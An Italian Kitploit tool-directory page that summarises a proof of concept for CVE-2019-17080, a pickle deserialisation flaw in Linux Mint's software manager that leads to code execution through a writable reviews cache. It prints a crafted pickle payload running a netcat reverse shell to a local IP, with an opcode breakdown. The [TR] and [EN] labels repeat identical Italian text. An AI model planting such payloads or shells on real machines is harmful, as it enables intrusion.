Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Strumenti/GitHubGitHub/andhrimnirr/mintinstall-object-injection
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebConfigurazione Errata
GitHubandhrimnirr/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1106 anni faNon ancora revisionato
Condividi

[TR] Il gestore software di Linux Mint (v 7.9.5/9) causa l'esecuzione di iniezione di oggetti e codice arbitrario a causa di una configurazione errata.

[EN] Il gestore software di Linux Mint (v 7.9.5/9) causa l'esecuzione di iniezione di oggetti e codice arbitrario a causa di una configurazione errata.

mintinsall

[TR] Quando eseguiamo il gestore software di Mint, controlla se ci sono nuovi commenti; se ci sono, li scarica da new-reviews.list e li scrive su file.

[EN] Quando eseguiamo il gestore software di Mint, controlla se ci sono nuovi commenti; se ci sono, li scarica da new-reviews.list e li scrive su file.

code mintinstall.py

[TR] Quando il gestore software viene avviato per la prima volta, chiama la classe ReviewCache() dal modulo reviews.

[EN] Quando il gestore software viene avviato per la prima volta, chiama la classe ReviewCache() dal modulo reviews.

Come elabora i dati?

Come elabora i dati?

code reviews.py

[TR] Quando la classe ReviewCache viene avviata (init) chiama la funzione _load_cache().

[EN] Quando la classe ReviewCache viene avviata (init) chiama la funzione _load_cache().

[TR] La funzione Load cache legge il file nella variabile REVIEWS_CACHE e unserializza i dati nel file con l'aiuto del modulo pickle e mantiene alcuni valori in memoria.

[EN] La funzione Load cache legge il file nella variabile REVIEWS_CACHE e unserializza i dati nel file con l'aiuto del modulo pickle e mantiene alcuni valori in memoria.

[TR] Quando controllo il file, sembra che io abbia il permesso di scrittura.

[EN] Quando controllo il file, sembra che io abbia il permesso di scrittura.

[TR] Poiché possiamo eseguire operazioni di serializzazione/unserializzazione con il modulo Pickle, possiamo includere il modulo ed eseguire codice arbitrario usando il metodo reduce.

[EN] Poiché possiamo eseguire operazioni di serializzazione/unserializzazione con il modulo Pickle, possiamo includere il modulo ed eseguire codice arbitrario usando il metodo reduce.

[TR] In questo caso, se si tenta di unserializzare il file, il nostro codice dannoso verrà eseguito.

[EN] In questo caso, se si tenta di unserializzare il file, il nostro codice dannoso verrà eseguito.

cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>> nome modulo c{os}
>> funzione
( >> oggetto indicatore 
S >> legge fino alla fine della stringa e la mette nello stack
tR. >> chiama gli oggetti nello stack e mette il risultato nello stack.

alt-text

Scarica lo strumento